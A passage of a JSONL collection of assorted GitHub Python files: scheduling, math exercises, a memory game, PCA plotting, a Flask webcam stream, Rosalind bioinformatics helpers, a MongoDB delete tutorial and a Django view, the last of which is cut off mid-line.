+{"seq_id":"28934734109","text":"\"\"\"\nнепосредственно, планировщик\n\n\"\"\"\nfrom basic_duties.__w_duty import WDuty\n\nclass DutyPlaner():\n def __init__(self, duties_list):\n self.duty_list = duties_list\n self.max_load = max(duties_list)\n self.min_load = min(duties_list)\n\n def calculate_duties(self):\n self.result = []\n w_duty = None\n for H in range(self.min_load+1, self.max_load+1):\n for t_i in range(len(self.duty_list)): ##t_i - индекс времени\n if self.duty_list[t_i] >= H:\n if (w_duty is None) or w_duty.finished:\n w_duty = WDuty(start=t_i, display_h=H)\n else:\n w_duty.prolongate()\n else:\n if (w_duty is not None):\n w_duty.finish()\n self.result.append(w_duty)\n return self.result\n\n\n\n","repo_name":"vtatulin/airport_duties","sub_path":"duty_planner/duty_planner.py","file_name":"duty_planner.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29371262049","text":"def resolver_sistema(a1, b1, c1, a2, b2, c2):\n determinante = a1 * b2 - a2 * b1\n\n if determinante == 0:\n return None # El sistema no tiene solución única\n\n x = (c1 * b2 - c2 * b1) / determinante\n y = (a1 * c2 - a2 * c1) / determinante\n\n return x, y\n\n# Ejemplo de uso del programa\na1 = 2\nb1 = 3\nc1 = 6\na2 = 1\nb2 = 2\nc2 = 5\n\nsolucion = resolver_sistema(a1, b1, c1, a2, b2, c2)\n\nif solucion is None:\n print(\"El sistema no tiene solución única.\")\nelse:\n x, y = solucion\n print(f\"x = {round(x, 1)}\")\n print(f\"y = {round(y, 1)}\")\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej9/hito1_ej9_077b230e0a00e606cf33de3d62b7fec2.py","file_name":"hito1_ej9_077b230e0a00e606cf33de3d62b7fec2.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574226967","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nm,n = map(int,input().split())\r\nnum = int(input().strip())\r\n\r\na = [[0]*m for _ in range(n)]\r\n\r\ndef in_range(x,y):\r\n if 0 <= x < n and 0 <= y < m:\r\n return True\r\n return False\r\nif num > m * n :\r\n print(0)\r\nelse:\r\n s = 1\r\n dirs = [(1,0),(0,1),(-1,0),(0,-1)]\r\n i = 0\r\n x,y = 0,0\r\n ans = [0,0]\r\n while num:\r\n if not in_range(x,y) or a[x][y]:\r\n x,y = x - dirs[i][0],y - dirs[i][1]\r\n i = (i + 1) % 4\r\n x,y = x + dirs[i][0],y + dirs[i][1]\r\n continue\r\n a[x][y] = s\r\n s += 1\r\n num -= 1\r\n ans = [y + 1,x + 1]\r\n x,y = x + dirs[i][0],y + dirs[i][1]\r\n print(*ans)\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Unrated/10157. 자리배정/자리배정.py","file_name":"자리배정.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31719979005","text":"import os\nimport subprocess\nimport sys\n\nfrom textwrap import dedent\n\nWIN = sys.platform.startswith('win')\n\nvenv = 'env'\nif WIN:\n venv_cmd = 'py -3 -m venv'\n venv_bin = os.path.join(venv, 'Scripts')\nelse:\n venv_cmd = 'python3 -m venv'\n venv_bin = os.path.join(venv, 'bin')\n\nvars = dict(\n separator='=' * 79,\n venv=venv,\n venv_cmd=venv_cmd,\n pip_cmd=os.path.join(venv_bin, 'pip'),\n pytest_cmd=os.path.join(venv_bin, 'pytest'),\n)\nmsg = dedent(\n \"\"\"\n Change directory into your newly created project.\n cd {{ cookiecutter.repo_name }}\n\n Create a Python virtual environment.\n %(venv_cmd)s %(venv)s\n\n Upgrade packaging tools.\n %(pip_cmd)s install --upgrade pip setuptools\n\n Install the project in editable mode with its testing requirements.\n %(pip_cmd)s install -e \".[testing]\"\n\n Run your project's tests.\n %(pytest_cmd)s\n\n Run your project.\n Create a docker compose file and set the required environment vars.\n \"\"\" % vars)\nprint(msg)\n","repo_name":"danpoland/pyramid-cookiecutter-restful","sub_path":"hooks/post_gen_project.py","file_name":"post_gen_project.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12360955588","text":"from enum import unique\n# from flask_sqlalchemy import SQLAlchemy\nimport torch.nn as nn\n\n# db = SQLAlchemy(app)\n\nclass NeuralNet(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(NeuralNet, self).__init__()\n self.l1 = nn.Linear(input_size, hidden_size) \n self.l2 = nn.Linear(hidden_size, hidden_size) \n self.l3 = nn.Linear(hidden_size, num_classes)\n self.relu = nn.ReLU()\n \n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n out = self.relu(out)\n out = self.l3(out)\n # no activation and no softmax at the end\n return out\n\n\n# class Student(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# username = db.Column(db.String(80), nullable=False)\n# email = db.Column(db.String(120), unique=True, nullable=False)\n# DOB = db.Column(db.DateTime(), nullable=False)\n# faculty = db.Column(db.String(80), nullable=False)\n# reg_no = db.Column(db.String(80), unique= True, nullable=False)\n# course = db.Column(db.String(80), nullable=False)\n# def __repr__(self):\n# return '' % self.username\n\n \n \n \n\n","repo_name":"AMfalme/chatbot","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24707582098","text":"from random import *\nfrom turtle import *\nfrom freegames import path\n\ncar = path('car.gif')\n#Cambio de innovación al juego, se cambiaron los dígitos para que al usuario le ayude a tener mejor memoria\ntiles = [\"▼\", \"▲\", \"✉\", \"✔\", \"☣\", \"⌘\", \"⌛\", \"☁\", \"✪\", \"➳\", \"✿\", \"⚡\", \"M\", \"☃\", \"☂\", \"✄\", \"∞\", \"✫\", \"♚\", \"☏\", \"❢\", \"☬\", \"♡\", \" ☺ \", \"✺\", \"✦\", \"☩\", \"♪\", \"♬\", \"✪\", \"✹\", \"☢\"] * 2\nstate = {'mark': None}\nhide = [True] * 64\nglobal cont_\ncont_= 0\nglobal cont\ncont = 0\ndef square(x, y):\n \"Draw white square with black outline at (x, y).\"\n up()\n goto(x, y)\n down()\n color('black', 'white')\n begin_fill()\n for count in range(4):\n forward(50)\n left(90)\n end_fill()\n\ndef index(x, y):\n \"Convert (x, y) coordinates to tiles index.\"\n return int((x + 200) // 50 + ((y + 200) // 50) * 8)\n\ndef xy(count):\n \"Convert tiles count to (x, y) coordinates.\"\n return (count % 8) * 50 - 200, (count // 8) * 50 - 200\n\ndef tap(x, y):\n \"Update mark and hidden tiles based on tap.\"\n global cont\n global cont_\n cont += 1\n print(cont)\n spot = index(x, y)\n mark = state['mark']\n\n if mark is None or mark == spot or tiles[mark] != tiles[spot]:\n state['mark'] = spot\n else:\n hide[spot] = False\n hide[mark] = False\n state['mark'] = None\n cont_ +=1\n \n if cont_ == 32:\n print(\"Felicidades!\")\n \n \n\ndef draw():\n \"Draw image and tiles.\"\n clear()\n goto(0, 0)\n shape(car)\n stamp()\n \n\n for count in range(64):\n if hide[count]:\n x, y = xy(count)\n square(x, y)\n write(cont, font=('Arial', 30, 'normal'))\n mark = state['mark']\n\n if mark is not None and hide[mark]:\n x, y = xy(mark)\n up()\n #Se centran los dígitos en los cuadros \n goto(x + 25, y)\n color('black')\n #Se escribe la propiedad para alinear los números\n write(tiles[mark], align = \"center\", font=('Arial', 30, 'normal'))\n \n \n update()\n ontimer(draw, 100)\n\nshuffle(tiles)\nsetup(420, 420, 370, 0)\naddshape(car)\nhideturtle()\ntracer(False)\nonscreenclick(tap)\ndraw()\ndone()\n","repo_name":"A01653004/MemoryGame","sub_path":"memoryGame.py","file_name":"memoryGame.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37956499262","text":"# DATS 6401: Lab 4 (Spring 22)\n# Lydia Teinfalt\n# 03/12/2022\n\nimport plotly.express as px\nimport pandas_datareader as web\nimport pandas as pd\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import linalg as LA\nimport seaborn as sns\n\nstocks = px.data.stocks()\ncolumns = stocks.columns\nprint(stocks.head())\n\n# There are six giant tech companies in this dataset. Plot the stock values versus time in one graph. The x- axis is the date and the y axis is the stock value. Update the layout with the following settings:\n# a. Font_color = ‘red’\n# b. Legend_title_font_color = ‘green’\n# c. font_family = ’ Courier New’\n# d. title_font_family = ‘Times New Roman’\n\n\nfig = px.line(stocks, x = 'date', y = columns, title='Stock Values - Major Tech Company')\nfig.update_layout(\n font_color=\"blue\",\n legend_title_font_color=\"green\",\n font_family=\"Courier New\",\n title_font_family=\"Times New Roman\",\n title_font_color=\"blue\",\n)\nfig.show(renderer = 'browser')\n\n#\nfig = make_subplots(rows=3, cols = 2)\nGOOG = go.Histogram(x=stocks['GOOG'],nbinsx = 50, name='GOOG')\nAAPL = go.Histogram(x=stocks['AAPL'],nbinsx = 50, name='AAPL')\nAMZN = go.Histogram(x=stocks['AMZN'],nbinsx = 50, name='AMZN')\nFB = go.Histogram(x=stocks['FB'],nbinsx = 50, name='FB')\nNFLX = go.Histogram(x=stocks['NFLX'],nbinsx = 50, name='NFLX')\nMSFT = go.Histogram(x=stocks['MSFT'],nbinsx = 50, name='MSFT')\nfig.append_trace(GOOG, 1, 1)\nfig.append_trace(AAPL, 1, 2)\nfig.append_trace(AMZN, 2, 1)\nfig.append_trace(FB, 2, 2)\nfig.append_trace(NFLX, 3, 1)\nfig.append_trace(MSFT, 3, 2)\nfig.show(renderer = 'browser')\n\n# 4. Consider each company stock as a feature that needs to be fed to a ML model. The target is not given in this problem.\n# You need to perform a complete PCA analysis of the ‘stocks’ dataset and answer the following questions and tasks:\n# a. Using the following library standard (normalize) the feature space from sklearn.preprocessing import StandardScaler\n# b. Find the singular values and condition number for the original feature space.\n# c. Find the correlation coefficient matrix between all feature of the original feature space and use the seaborn heatmap to display the result.\n# The heatmap for this question should be look like bellow:\nfeatures = columns.to_list()[1:]\nX = stocks[features].values\nX = StandardScaler().fit_transform(X)\n\npca = PCA(n_components = 'mle', svd_solver='full')\npca.fit(X)\nX_PCA = pca.transform(X)\nprint(\"Original Dim\", X.shape)\nprint(\"Transformed Dim\", X_PCA.shape)\nprint(f\"explained variance ratio {pca.explained_variance_ratio_}\")\nprint('*'*100)\n\nplt.figure()\nx = np.arange(1,len(pca.explained_variance_ratio_)+1,1)\nplt.xticks(x)\nplt.ylabel('cumulative explained variance')\nplt.grid(True)\nplt.xlabel('number of components')\nplt.plot(x,np.cumsum(pca.explained_variance_ratio_))\nplt.show(renderer = 'browser')\n\nprint('*'*100)\n#==========================================================\n# SVD Analysis and Conditional Number on the original data\n#==========================================================\n\nH = np.matmul(X.T, X)\n_, d, _ = np.linalg.svd(H)\nprint(f'Original Data: Singular Values {d}')\nprint(f'Original Data: condition number {LA.cond(X)}')\nprint('*'*100)\n#==========================================================\n# SVD Analysis and Conditional Number on the transformed data\n#==========================================================\n\nH_PCA = np.matmul(X_PCA.T, X_PCA)\n_, d_PCA, _ = np.linalg.svd(H_PCA)\nprint(f'Transformed Data: Singular Values {d_PCA}')\nprint(f'Transformed Data: condition number {LA.cond(X_PCA)}')\nprint('*'*100)\n\n\nsns.heatmap(stocks[features].corr())\nplt.title('Correlation Coefficients between Features - Original Feature Space')\nplt.show(renderer = 'browser')\n\n#==========================================================\n# Construction of reduced dimension dataset\n#==========================================================\na,b = X_PCA.shape\ndf_reduced = pd.DataFrame(data = X_PCA)\ncolumn = []\nfor i in range(b):\n column.append(f'Principal Col {i+1}')\ndf_PCA = pd.DataFrame(data = X_PCA, columns = column)\n\n\nprint(df_PCA.head())\n#==========================================================\nsns.heatmap(df_PCA.corr())\nplt.title('Correlation Coefficients between Features - Reduced Feature Space')\nplt.tight_layout()\nplt.show()\n#==========================================================\ndf_PCA['date'] = stocks['date']\nreduced_cols = df_PCA.columns[:5]\nfig = px.line(df_PCA, x = 'date', y =reduced_cols , title='Stock Values - Reduced Feature Space')\nfig.update_layout(\n font_color=\"blue\",\n legend_title_font_color=\"green\",\n font_family=\"Courier New\",\n title_font_family=\"Times New Roman\",\n title_font_color=\"blue\",\n)\nfig.show(renderer = 'browser')\n\n\nfig = make_subplots(rows=4, cols = 1)\nGOOG = go.Histogram(x=df_PCA.iloc[0], name='Principal Col 1')\nAAPL = go.Histogram(x=df_PCA.iloc[1],name='Principal Col 2')\nAMZN = go.Histogram(x=df_PCA.iloc[2],name='Principal Col 3')\nFB = go.Histogram(x=df_PCA.iloc[3],name='Principal Col 4')\nfig.append_trace(GOOG, 1, 1)\nfig.append_trace(AAPL, 2, 1)\nfig.append_trace(AMZN, 3, 1)\nfig.append_trace(FB, 4, 1)\nfig.show(renderer = 'browser')\n\nfig = px.scatter_matrix(stocks[features])\nplt.title(\"Original Feature Space\")\nplt.tight_layout()\nfig.show(renderer = 'browser')\n\nfig = px.scatter_matrix(df_PCA[column])\nplt.title(\"Reduced Feature Space\")\nplt.tight_layout()\nfig.show(renderer = 'browser')","repo_name":"lydiateinfalt/DATS6401-DataVisualization-Spring22","sub_path":"Lab/Lab4_LydiaTeinfalt_DATS6401.py","file_name":"Lab4_LydiaTeinfalt_DATS6401.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19310952452","text":"import requests\nimport pandas as pd\n\ndef run_query(query):\n response = requests.post('https://tarkov-tools.com/graphql', json={'query': query})\n if response.status_code == 200:\n return response.json()\n else:\n raise Exception(\"Query failed to run by returning code of {}. {}\".format(response.status_code, query))\n\n\nnew_query = \"\"\"\nquery {\n crafts {\n source\n duration\n rewardItems {\n quantity\n item {\n shortName\n lastLowPrice\n }\n }\n requiredItems {\n quantity\n item {\n shortName\n lastLowPrice\n }\n }\n }\n}\n\"\"\"\n\nresult = run_query(new_query)\n# print(result)\n\ndef filterByStation(station_id,data):\n my_columns = ['station', 'name', 'output_price', 'duration', 'input_price', 'profit', 'profit_per_hour']\n df = pd.DataFrame(columns=my_columns)\n duration = 0\n for item in data[\"data\"][\"crafts\"]:\n # if item[\"source\"] == 'Booze generator level 1':\n duration = round((item[\"duration\"]) / 60 / 60, ndigits=3)\n # for item2 in item[\"rewardItems\"]:\n reward = item[\"rewardItems\"]\n name_output = reward[0][\"item\"][\"shortName\"]\n input_price = 0\n quantity = reward[0][\"quantity\"]\n output_item = reward[0][\"item\"][\"lastLowPrice\"]\n if output_item is None:\n output_item = 0\n output_price = quantity * int(output_item)\n station_name = item[\"source\"]\n for item2 in range(len(item[\"requiredItems\"])):\n # print(item[\"requiredItems\"][item2][\"quantity\"])\n quantity_i = item[\"requiredItems\"][item2][\"quantity\"]\n print(item[\"requiredItems\"][item2][\"item\"][\"lastLowPrice\"])\n aitem = item[\"requiredItems\"][item2][\"item\"][\"lastLowPrice\"]\n if aitem is None:\n aitem = 0\n price_of_items = aitem * quantity_i\n input_price = input_price + price_of_items\n profit = output_price - input_price\n profit_p_hour = round(profit / duration, ndigits=3)\n df = df.append(\n pd.Series([station_name, name_output, output_price, duration, input_price, profit, profit_p_hour],\n index=my_columns), ignore_index=True)\n return df\n\nprint(filterByStation(\"Nutrition unit level 1\",result))\n# print(filterByStation(\"Nutrition unit level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Nutrition unit level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n#\n# print(filterByStation(\"Lavatory level 1\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Lavatory level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Lavatory level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n#\n# print(filterByStation(\"Medstation level 1\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Medstation level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Medstation level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n#\n# print(filterByStation(\"Workbench level 1\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Workbench level 2\",result).sort_values(by=['profit per hour'],ascending=False))\n# print(filterByStation(\"Workbench level 3\",result).sort_values(by=['profit per hour'],ascending=False))\n","repo_name":"JachymDolezal/TarkovCraftBot","sub_path":"TestScripts/TestOfAPI.py","file_name":"TestOfAPI.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15148220491","text":"\"\"\"Show example images from specified imagenet categories\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport nengo_extras.data\nfrom nengo_extras.matplotlib import tile\n\nimages, labels, data_mean, label_names = nengo_extras.data.load_ilsvrc2012()\n\n# images, labels, data_mean, label_names = (\n# nengo_extras.data.load_ilsvrc2012(n_files=1))\n\nfor s in label_names:\n print(s)\n\nplt.figure()\n# show = 'butcher'\nshow_names = ['butcher', 'restaurant', 'planetarium', 'church', 'library']\n\nfor i, show_name in enumerate(show_names):\n match = [s.startswith(show_name) for s in label_names]\n index = match.index(True) if True in match else None\n mask = (labels == index) if index is not None else None\n count = mask.sum() if mask is not None else None\n if count is not None:\n print(\"Found %d matches for %r: showing index %d, %d examples\" % (\n sum(match), show_name, index, count))\n\n plt.subplot(len(show_names), 1, i+1)\n tile(np.transpose(images[mask].reshape(-1, 3, 256, 256), (0, 2, 3, 1)),\n rows=3, cols=5)\n\nplt.show()\n","repo_name":"hunse/phd","sub_path":"scripts/supporting_figures/imagenet_categories.py","file_name":"imagenet_categories.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"74213213368","text":"'''\r\nDjango tests for views.\r\n'''\r\n\r\nfrom django.test import TestCase, Client\r\nfrom django.urls import reverse\r\nimport json\r\n\r\n\r\nclass TestViews(TestCase):\r\n '''\r\n Class with unittests for views.\r\n '''\r\n def setUp(self):\r\n '''\r\n Set up for tests.\r\n '''\r\n self.client = Client()\r\n self.form_url = reverse(\"index\")\r\n self.form_url_II = reverse(\"create\")\r\n\r\n def test_GET_index(self):\r\n '''\r\n GET method for index, tests.\r\n '''\r\n response = self.client.get(self.form_url)\r\n\r\n self.assertEqual(response.status_code, 200)\r\n # below looks at dir templates\r\n self.assertTemplateUsed(response, 'index.html')\r\n\r\n","repo_name":"JakubKazimierski/PythonPortfolio","sub_path":"Django/Django_three_projects/urlshortner/shortner/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"40153102040","text":"from flask import Flask, Response, render_template\nimport cv2\n\napp = Flask(__name__)\n\n# working code for video streaming =============================\n# remaining to work with the end part of opencv\n\n\ncamera = cv2.VideoCapture(0)\n\"\"\"\n Creates video object using the webcam (0)\n \n Video Capture of cv2 library is used to create an camera object\n which references the webcam.\n\"\"\"\ndef gen_frames():\n \"\"\"\n Function to get frames using the opencv\n \"\"\" \n while True:\n success, frame = camera.read() # read the camera frame\n if not success:\n break\n else:\n ret, buffer = cv2.imencode('.jpg', frame)\n frame = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n\n\n# @app.route(\"/hello\")\n# def hello_world():\n# return \"

Hello, World!

\"\n\n\n\n# @app.route(\"/\")\n# def stream_video():\n# get_image_frame()\n# return \"

Hello, World!

\"\n\n# def get_image_frame():\n# import cv2 as cv\n# video = cv.VideoCapture(0)\n# while True:\n# return_value, frame = video.read()\n# cv.imshow(\"Image window\", frame)\n# key = cv.waitKey(1)\n# if key == ord(\"q\"):\n# break\n# video.release()\n# cv.destroyAllWindows()\n# cv.waitKey(1)\n\n\n# @app.route(\"/check\")\n# def check():\n# return Response(gen_function())\n\n# @app.route(\"/\")\n# def check2():\n# return Response(gen_template_function())\n\n# def gen_function():\n# yield \"

Hello, World!

\"\n# for i in range(19):\n# yield \"

Hello, World! middle

\"\n# yield \"

Hello, World! foooter

\"\n\n# def gen_template_function():\n# yield render_template(\"header.html\")\n# for i in range(19):\n# yield render_template(\"body.html\")\n# yield render_template(\"footer.html\")\n\n\n# from flask import Flask, render_template, Response\n# from camera import Camera\n\n# app = Flask(__name__)\n\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n\n# def gen(camera):\n# while True:\n# frame = camera.get_frame()\n# yield (b'--frame\\r\\n'\n# b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n# @app.route('/video_feed')\n# def video_feed():\n# return Response(gen(Camera()),\n# mimetype='multipart/x-mixed-replace; boundary=frame')\n\n# if __name__ == '__main__':\n# app.run(host='0.0.0.0', port= 8989, debug=True)","repo_name":"bisalgt/playground","sub_path":"flask-videstreamer/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"69953342970","text":"def timer(func):\n def func_wrapper(*args, **kwargs):\n from time import time\n time_start = time()\n result = func(*args, **kwargs)\n time_end = time()\n print('{0} cost time {1} s'.format(func.__name__, time_end - time_start))\n\n return result\n\n return func_wrapper\n\n\ndef load_edge_list(filepath: str) -> (list, list):\n n, m, nodes, edges = 0, 0, [], []\n with open(filepath, 'r') as f:\n # n->number of nodes, m->number of edges\n n, m = [int(item) for item in f.readline().strip().split()]\n for _ in range(m): # read edges\n start_node, end_node = [int(item) for item in f.readline().strip().split()]\n edges.append((start_node, end_node))\n nodes = [item for item in range(1, n + 1)]\n print(f\"Load {len(edges)} edges, {len(nodes)} nodes from {filepath}\")\n return nodes, edges\n\n\ndef load_graph_from_edge_list(filepath: str, undirected: bool = False):\n nodes, edges = load_edge_list(filepath)\n graph = {node: [] for node in nodes}\n for start_node, end_node in edges:\n graph[start_node].append(end_node)\n if undirected:\n graph[end_node].append(start_node)\n return nodes, graph\n\n\ndef load_n_list(filepath: str) -> (int, list):\n with open(filepath, 'r', encoding='utf-8') as f:\n n_elems = int(f.readline().strip())\n elems = [int(item) for item in f.readline().strip().split()]\n return n_elems, elems\n\n\ndef load_arrs(filepath: str) -> (int, int, list):\n with open(filepath, 'r', encoding='utf-8') as f:\n n_arrs, arr_len = [int(item) for item in f.readline().strip().split()]\n arrs = [[int(elem) for elem in f.readline().strip().split()] for _ in range(n_arrs)]\n print(f\"Load {n_arrs} lists, each list has {arr_len} elems\")\n return n_arrs, arr_len, arrs\n\n\ndef breath_first_search(nodes: list, graph: dict, start_node):\n if start_node not in nodes:\n return\n # init queue, order and distance dict\n queue, order = [], []\n distance = {node: 0 for node in nodes}\n queue.append(start_node)\n order.append(start_node)\n # start search\n while queue:\n v = queue.pop(0)\n for n in graph[v]:\n if n not in order:\n distance[n] = distance[v] + 1\n order.append(n)\n queue.append(n)\n # mark unreachable node's distance as -1\n for n in nodes:\n if n not in order:\n distance[n] = -1\n return order, distance\n\n\ndef degree_array(nodes: list, edges: list) -> list:\n da_dict = {node: 0 for node in nodes}\n for start_node, end_node in edges:\n da_dict[start_node] += 1\n da_dict[end_node] += 1\n return [da_dict[node] for node in nodes]\n\n\ndef list_2_str(x: list, sep: str = ' '):\n return sep.join([str(item) for item in x])\n\n\ndef swap(arr: list, pos1: int, pos2: int):\n arr[pos1], arr[pos2] = arr[pos2], arr[pos1]\n\n\ndef sort_with_pos(x: list) -> (list, list):\n elem_pos_tuples = [(x[pos], pos) for pos in range(len(x))]\n elem_pos_tuples = sorted(elem_pos_tuples, key=lambda t: t[0])\n\n sorted_x = [t[0] for t in elem_pos_tuples]\n sorted_pos = [t[1] for t in elem_pos_tuples]\n\n return sorted_x, sorted_pos\n","repo_name":"xwmp3/rosalind-python","sub_path":"algorithmic-heights/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9077382831","text":"import socket\nimport osc_decoder\nimport asyncio\nimport websockets\nimport json\n\n# ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\n# Inputs\nudp_port = 8239 # Same as UDP send port in NGIMU settings\nws_port = 8888\n# ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\n\n# Create a UDP socket at client side\nUDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n# binding\nUDPClientSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nUDPClientSocket.bind((\"\", udp_port))\n\n\nasync def handler(websocket, path):\n while True:\n try:\n msgFromServer, addr = UDPClientSocket.recvfrom(1024)\n\n # Everything was ok with this code, the threading it self is not required I guess\n await websocket.send(json.dumps(osc_decoder.decode(msgFromServer)))\n\n # This right here was the problem, if not called to sleep, data would buffer up and only send in batch\n await asyncio.sleep(0)\n\n except socket.error as e:\n print(e)\n pass\n\nif __name__ == '__main__':\n start_server = websockets.serve(handler, \"127.0.0.1\", ws_port)\n\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()","repo_name":"joaohenriqueluz/VSB-STeH","sub_path":"ngimu/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14156807607","text":"import logging\nimport uuid\nimport urlparse\n\nfrom website import settings\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass GraphNode(object):\n\n @property\n def ref(self):\n return {'@id': self.id, '@type': self.type}\n\n def __init__(self, type_, **attrs):\n self.id = '_:{}'.format(uuid.uuid4())\n self.type = type_.lower()\n self.attrs = attrs\n\n def get_related(self):\n for value in self.attrs.values():\n if isinstance(value, GraphNode):\n yield value\n elif isinstance(value, list):\n for val in value:\n yield val\n\n def serialize(self):\n ser = {}\n for key, value in self.attrs.items():\n if isinstance(value, GraphNode):\n ser[key] = value.ref\n elif isinstance(value, list) or value in {None, ''}:\n continue\n else:\n ser[key] = value\n\n return dict(self.ref, **ser)\n\n\ndef format_user(user):\n person = GraphNode('person', **{\n 'suffix': user.suffix,\n 'given_name': user.given_name,\n 'family_name': user.family_name,\n 'additional_name': user.middle_names,\n })\n\n person.attrs['identifiers'] = [GraphNode('agentidentifier', agent=person, uri='mailto:{}'.format(uri)) for uri in user.emails]\n\n if user.is_registered:\n person.attrs['identifiers'].append(GraphNode('agentidentifier', agent=person, uri=user.profile_image_url()))\n person.attrs['identifiers'].append(GraphNode('agentidentifier', agent=person, uri=urlparse.urljoin(settings.DOMAIN, user.profile_url)))\n\n person.attrs['related_agents'] = [GraphNode('isaffiliatedwith', subject=person, related=GraphNode('institution', name=institution.name)) for institution in user.affiliated_institutions.all()]\n\n return person\n\n\ndef format_contributor(preprint, user, bibliographic, index):\n return GraphNode(\n 'creator' if bibliographic else 'contributor',\n agent=format_user(user),\n order_cited=index if bibliographic else None,\n creative_work=preprint,\n cited_as=user.fullname,\n )\n","repo_name":"Rheisen/osf.io","sub_path":"website/util/share.py","file_name":"share.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"43198015264","text":"import pymongo\r\n\r\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydb = myclient[\"mydatabase\"]\r\nmycol = mydb[\"customers\"]\r\n\r\nprint(\"\\n\\t\\t Delete Address Mountain 21\")\r\nmyquery = { \"address\": \"Mountain 21\" }\r\nmycol.delete_one(myquery)\r\n\r\n\r\nprint(\"Delete address: {$regex: ^S}\")\r\nmyquery = { \"address\": {\"$regex\": \"^S\"} }\r\nx = mycol.delete_many(myquery)\r\n\r\nprint(x.deleted_count, \" documents deleted.\")\r\n\r\n\r\nprint(\"Delete All\")\r\nx = mycol.delete_many({})\r\n\r\nprint(\"Drop collection\")\r\nmycol.drop()\r\nprint(x.deleted_count, \" documents deleted.\")","repo_name":"aatmasidha/pythonmongodb","sub_path":"mongodelete.py","file_name":"mongodelete.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18014880862","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.http import HttpResponseRedirect\nfrom .forms import TaskForm\nfrom django.utils import timezone\nfrom .basa import *\n\n\nclass ExitPage(View):\n def get(self, request):\n context = {}\n return render(request, 'exit.html', context=context)\n\n def post(self, request):\n login = request.POST.get(\"login\")\n password = request.POST.get(\"password\")\n users = autoriz(login, password)\n if not users:\n context = {\n \"message\": \"Введен не правильный пароль или 